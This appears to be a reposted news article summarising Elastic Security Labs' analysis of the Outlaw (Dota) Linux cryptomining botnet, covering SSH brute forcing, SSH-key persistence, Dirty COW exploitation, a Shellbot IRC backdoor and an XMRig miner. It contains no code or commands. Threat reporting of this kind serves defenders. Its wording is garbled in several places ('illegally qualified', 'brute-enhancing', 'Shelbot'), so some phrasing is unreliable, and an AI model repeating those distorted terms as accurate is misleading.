Cybersecurity researchers are shedding light on the “automatic propagation” cryptocurrency mining botnet known as Outlaw (aka Dota), which is known for targeting illegally qualified SSH servers.
“Outlaw is a Linux malware that relies on SSH brute force attacks, cryptocurrency mining, and worm-like propagation to infect and maintain systems,” Elastic Security Lab said in a new analysis released Tuesday.
Outlaws are also the name given to the threat actors behind the malware. It is thought to be of Romanian origin. Other hacking groups that dominate the cryptojacking landscape include 8220, Keksec (aka Kek Security), Kinsing, and Teamtnt.
Hacking crews, which have been active since at least late 2018, are carrying out reconnaissance and abuse their scaffolding to maintain the persistence of compromised hosts by brute-enhancing their SSH servers and adding their own SSH keys to the “Authorized_Keys” file.
It is also known that attackers incorporate a multi-stage infection process that uses a dropper shell script (“TDDWRT7S.SH”) to download archive files (“dota3.tar.gz”).
A notable feature of malware is the initial access component (aka Blitz), which allows for self-propagation of malware in a botnet-like manner by scanning vulnerable systems running SSH services. The brute force module is configured to retrieve the target list from an SSH command and control (C2) server to further persist the cycle.
Several iterations of the attack also rely on leveraging Linux and UNIX-based operating systems that are susceptible to CVE-2016-8655 and CVE-2016-5195 (aka Dirty Cow). Once initial access is obtained, the malware uses the IRC channel to deploy a Shelbot for the remote control via the C2 server.
Shellbot allows you to execute any shell command, download and run additional payloads, launch DDOS attacks, steal credentials, and remove sensitive information.
As part of the mining process, you can determine the CPU of the infected system and the huge pages of all CPU cores can increase memory access efficiency. The malware also uses a binary called KSWAP01 to ensure persistent communication with the threat actor’s infrastructure.
“Even though they use basic technologies such as SSH brute enhancement, SSH keymanipulation and Cron-based persistence, outlaws are still active,” Elastic said. “The malware deploys a modified Xmrig miner, leverages C2’s IRC, and includes scripts that are published for persistence and defence evasion.”
Source link
